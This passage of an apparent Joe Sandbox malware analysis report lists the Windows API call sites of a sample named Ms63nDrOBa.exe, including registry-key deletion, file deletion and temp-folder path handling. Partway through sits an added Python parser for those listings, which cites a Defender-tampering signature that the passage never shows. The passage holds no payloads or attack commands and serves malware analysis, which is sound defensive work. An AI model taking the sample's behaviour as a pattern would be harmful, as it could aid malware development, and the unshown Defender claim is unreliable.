                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                  • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: c58995e68432e7249e988c80aa0e1a33c88a6fdfba4ce0329c84874909ba7ef0
                                                  • Instruction ID: c874634495a4b446fb751942016c9e5cc597fe9d4aaee657827b690e02a6ad76
                                                  • Opcode Fuzzy Hash: c58995e68432e7249e988c80aa0e1a33c88a6fdfba4ce0329c84874909ba7ef0
                                                  • Instruction Fuzzy Hash: 0231AF71D00128ABCF21AFA5CE49D9E7EB9AF45324F10423AF551762E1CB794C419FA8
                                                  APIs
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                  • Instruction ID: f4e9f9df98694428ddab884ff763f6d95bd8863eb2dee119fedf423c13c251a9
                                                  • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                  • Instruction Fuzzy Hash: F4216B7150010ABFDF119F90CE89EEF7B7DEB54388F100076B949B11E0D7B49E54AA68
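Added example (this is not part of the Joe Sandbox report and not Joe Sandbox's own code): a small Python parser for the "APIs" entries in the function listings above, so the call sites can be pulled out of a report export and cross-referenced in a disassembler. The sample lines are copied from the listings on this page (the registry enumeration/deletion function, the ReadFile function with its nested "Part of subcall function" entry, the GetMessagePos entry that has no argument list, and the DeleteFileW entry; one argument list is shortened). The image base comes from "Offset: 00400000" in the Memory Dump Source lines; the function names and the choice of RegDeleteKeyW/DeleteFileW as the calls to highlight are this example's own.

```python
import re
from collections import Counter

# Constructed sample: "APIs" bullet lines copied from this report's function
# listings. The indented "Part of subcall function" line is kept to show how
# nested entries are attributed to their callee.
SAMPLE_APIS = """\
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
• ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
  • Part of subcall function 00406105: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 0040611B
• GetMessagePos.USER32 ref: 00404E91
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
"""

# One entry: optional subcall prefix, API.MODULE, optional "(args)", then
# "ref: ADDR". The comma before "ref:" is absent when there is no argument list.
ENTRY_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# "Offset: 00400000" in the Memory Dump Source lines (assumed fixed here).
IMAGE_BASE = 0x400000


def parse_api_entries(text):
    """Parse Joe Sandbox 'APIs' bullet lines into dicts.

    Lines that do not have the entry shape (section headers such as
    'Strings' or 'Memory Dump Source') are skipped rather than raising.
    """
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        ref = int(m.group("ref"), 16)
        entries.append({
            "api": m.group("api"),
            "module": m.group("mod").upper(),
            "args": [] if args is None else args.split(","),
            "ref": ref,
            # RVA against the dump's image base, for IDA/Ghidra navigation.
            "rva": ref - IMAGE_BASE,
            "subcall_of": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return entries


def calls_per_module(entries):
    """Count call sites per DLL, nested subcall entries included."""
    return Counter(e["module"] for e in entries)


def find_call_sites(entries, api_names):
    """Return the call-site addresses of the named APIs, in listing order."""
    wanted = set(api_names)
    return [e["ref"] for e in entries if e["api"] in wanted]


if __name__ == "__main__":
    parsed = parse_api_entries(SAMPLE_APIS)
    print(calls_per_module(parsed))
    # Deletion primitives are worth a second look in a sample that the
    # signature list says tampers with Defender settings.
    for addr in find_call_sites(parsed, {"RegDeleteKeyW", "DeleteFileW"}):
        print(f"deletion call at 0x{addr:08X} (RVA 0x{addr - IMAGE_BASE:X})")
```

The parser deliberately ignores the "?" placeholders rather than trying to type them: in these listings a "?" means the argument was not resolved statically, so only the literal values (for example the 0x40000000 / 0x00000002 pair in the DeleteFileW entry) carry information.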
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                  • GetClientRect.USER32(?,?), ref: 00401DEA
                                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                  • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: de7853213b54b41e4d82286969a45229422243a67b8734ea48bfba129f49795d
                                                  • Instruction ID: 81d9f022906ee6244d37cab0c0f29790f3f95abc113fce67048acd2dff417476
                                                  • Opcode Fuzzy Hash: de7853213b54b41e4d82286969a45229422243a67b8734ea48bfba129f49795d
                                                  • Instruction Fuzzy Hash: 8B212672904119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0CB789D81DB98
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E56
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                  • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                  • Instruction ID: ae55cc3b281789b51300203e9483e2b03caeed801d822a8147b49045e961ec64
                                                  • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                  • Instruction Fuzzy Hash: F4017571954240EFEB015BB4AE99ADD3FB4AF15301F10497AF141B61E2CAB904449B2C
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: c2490f809f288260d3854a97f2c9280dc6f84d52f63112501a652163611abe32
                                                  • Instruction ID: 5d336d63bea0f4dd646979e45c63d0f3d2888182fff20de36e63ae33d1796f08
                                                  • Opcode Fuzzy Hash: c2490f809f288260d3854a97f2c9280dc6f84d52f63112501a652163611abe32
                                                  • Instruction Fuzzy Hash: 2A21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                  APIs
                                                  • lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E01
                                                  • wsprintfW.USER32 ref: 00404E0A
                                                  • SetDlgItemTextW.USER32(?,007A1748), ref: 00404E1D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                                                  • Instruction ID: a0af56433f9d431f5046a9fb23145e7ed032e621b14740f85a591f17ba678af7
                                                  • Opcode Fuzzy Hash: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                                                  • Instruction Fuzzy Hash: 6211E773A041283BDB1055ADEC45EAE369CDF86334F254237FA25F21D1EA78CC2182E8
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405E09
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405E13
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405E25
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E03
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3936084776
                                                  • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction ID: 4e7d22dde89eb6c6e58e9bdf2ba0d87ed645a023497c505cae90b6f2f3d33009
                                                  • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction Fuzzy Hash: E4D05E31101534AAC211AB48AC04CDB62ACAF46308342403AF541B60A9D7785A5186ED
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                  • GetTickCount.KERNEL32 ref: 0040304F
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                  • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: ca2d4b092798976e8b8a2b9fdb12b7f7a1786ddd6dd9d0f4e36fae50c1a32754
                                                  • Instruction ID: b3f6d95266cfacf47387896993e225006fc9e276d4c6cccc21fcd3db6f14a0d4
                                                  • Opcode Fuzzy Hash: ca2d4b092798976e8b8a2b9fdb12b7f7a1786ddd6dd9d0f4e36fae50c1a32754
                                                  • Instruction Fuzzy Hash: A0F05E70406621AFC6606F90BE08A9B7A68FB45B62B45843BF145F11E8CB3C48818B9D
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 0040555C
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004055AD
                                                    • Part of subcall function 004044FF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404511
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                                                  • Instruction ID: 2594d1478f304c6df33f9b27245b4e56ea2549959463d6621d9ed09538c1d2b9
                                                  • Opcode Fuzzy Hash: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                                                  • Instruction Fuzzy Hash: 6C017C71100608BBEF219F15DD80A9B3B27EB88750F104037FA05B61D5C73E9D919E6D
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403B49,00403A5F,?,?,00000008,0000000A,0000000C), ref: 00403B8B
                                                  • GlobalFree.KERNEL32(00000000), ref: 00403B92
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B71
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3936084776
                                                  • Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                                  • Instruction ID: 86827d460d6d0210cfbc43ab248bfd1705f6cbab4bd02b4ce4b4e0dc829d3a13
                                                  • Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                                  • Instruction Fuzzy Hash: 2EE012334012305BC6215F56ED04B5AB778AF55B26F09813FE940BB26287786C438FD8
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ms63nDrOBa.exe,C:\Users\user\Desktop\Ms63nDrOBa.exe,80000000,00000003), ref: 00405E55
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ms63nDrOBa.exe,C:\Users\user\Desktop\Ms63nDrOBa.exe,80000000,00000003), ref: 00405E65
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3125694417
                                                  • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction ID: 4264e746bbe9179bf63afe9cfc5b53a917ba9e4059aba7f94742f87ad442e0a4
                                                  • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction Fuzzy Hash: 73D0A7B3400930DAC312A704ED00D9F73ECEF5234474A4466E881A7169D7785E8186EC
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FB1
                                                  • CharNextA.USER32(00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FC2
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
